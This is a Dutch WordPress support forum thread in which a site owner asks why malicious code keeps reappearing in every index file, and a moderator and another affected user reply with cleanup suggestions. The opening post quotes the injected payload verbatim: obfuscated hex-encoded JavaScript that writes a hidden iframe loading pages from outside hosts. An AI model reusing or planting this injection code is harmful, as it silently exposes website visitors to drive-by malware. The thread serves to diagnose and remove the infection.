• Sinds kort is er iets heel erg vreemds aan de hand met mijn website. Ik heb geen idee hoe en waarom dit zo komt maar ik heb een groot vermoeden dat het door WordPress komt.

    In al mijn index files, en dan bedoel ik ook echt al mijn index files wordt op een of andere manier op het eind van de regel een stukje code geplaatst naar een onzichtbaar Iframe, heel erg vreemd, en zo uit het niets komen opdagen. Ook andere mappen worden ”geïnfecteerd”, erg vervelend want bij Google staat mijn website al op de zwarte lijst met adware.

    Het script wat wordt geplaatst is onderstaande. Heeft iemand enig idee hoe het mogelijk is dat deze wordt toegevoegd?

    <script>rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));</script><script>function v4aa94e3f9b655(v4aa94e3f9ba3c){ function v4aa94e3f9be24 () {var v4aa94e3f9c20d=16; return v4aa94e3f9c20d;} return(parseInt(v4aa94e3f9ba3c,v4aa94e3f9be24()));}function v4aa94e3f9c5f5(v4aa94e3f9c9dc){ var v4aa94e3f9cdc4='';for(v4aa94e3f9d1ad=0; v4aa94e3f9d1ad<v4aa94e3f9c9dc.length; v4aa94e3f9d1ad+=2){ v4aa94e3f9cdc4+=(String.fromCharCode(v4aa94e3f9b655(v4aa94e3f9c9dc.substr(v4aa94e3f9d1ad, 2))));}return v4aa94e3f9cdc4;} document.write(v4aa94e3f9c5f5('3C696672616D65206E616D653D27386335623527207372633D27687474703A2F2F7777772E676F6F647374756666726576696577732E636F6D2F77702D696E636C756465732F706F6D6F2F6B6F6F2F676F2E7068703F7369643D31272077696474683D323835206865696768743D343138207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

5 reacties aan het bekijken - 1 tot 5 (van in totaal 5)
  • Moderator Remkus de Vries

    (@defries)

    Sleutelbeheer WordPress NL

    Dit is geen WordPress probleem, maar ik gok dat je niet de laatste versie van WordPress draait. Meer informatie hierover vind je hier: http://wpdimensie.nl/wordpress/oude-wordpress-installaties-worden-aangevallen.htm

    Thread starter bartvdploeg

    (@bartvdploeg)

    Tegen de tijd dat ik de eerste keer deze melding kreeg was dit nog niet de laatste versie. Deze heb ik echter geüpdatet maar de code bleef terugkeren. Niet op 1 van mijn bestanden maar werkelijk alle index bestanden op mijn site. Gister heb ik daarom alles verwijderd en alleen mijn database van wordpress laten staan. Alles opnieuw geïnstalleerd, alles schoon en vandaag ben ik weer heerlijk besmet met hetzelfde stukje code. Het lijkt me nu wel degelijk een probleem van WordPress of niet?

    Ik heb precies het zelfde, zij het dat er bij mij een andere code staat.
    Twee websites die er uit geknalt worden.
    Heb alles bij 1 site opnieuw geinstaleerd, werd wakker en weer eruit.
    Bij mij word de Iframe code toegevoegd in default-widgets.php
    Ik gebruik de laatste versie van wp.

    Moderator Remkus de Vries

    (@defries)

    Sleutelbeheer WordPress NL

    Als je de oude inhoud van de site mee kopieert dan kopieer je steeds opnieuw de gehackte code mee.. en dan loop je dus tegen dit probleem aan. Ook al heb je nu de nieuwste versie draaien, dan nog .. als de hack code er 1 keer in zit dan zul je dat allemaal echt moeten verwijderen. handmatig.

    In de link die ik hier boven geef vind je een link naar een blogpost van Lorelle.. daarin staat alle informatie die je nodig hebt om je installatie op te schonen.

    Ik kan je vertellen dat ik werkelijk alles heb geprobeerd.
    Ook de schone code zonder een stukje oude code.
    Ze blijven er uit knallen.
    Heb gisteren avond weer wat anders gedaan, bij de ene site heb ik uit .htaccess een code verwijderd die je browser links netjes maakt.
    <module engine on of iets dergelijks, wat blijkt! bij die site, hij deed het vanmorgen nog steeds.
    De andere site waar de htaccess code nog wel in zit lag er wel uit, nieuwe schone code nieuwe tabellen in m’n database en toch eruit gevallen.
    Ik heb nu ook daar de engine on code verwijderd om te kijken hoe lang het goed gaat.

5 reacties aan het bekijken - 1 tot 5 (van in totaal 5)
  • Het onderwerp ‘Index Bug?’ is gesloten voor nieuwe reacties.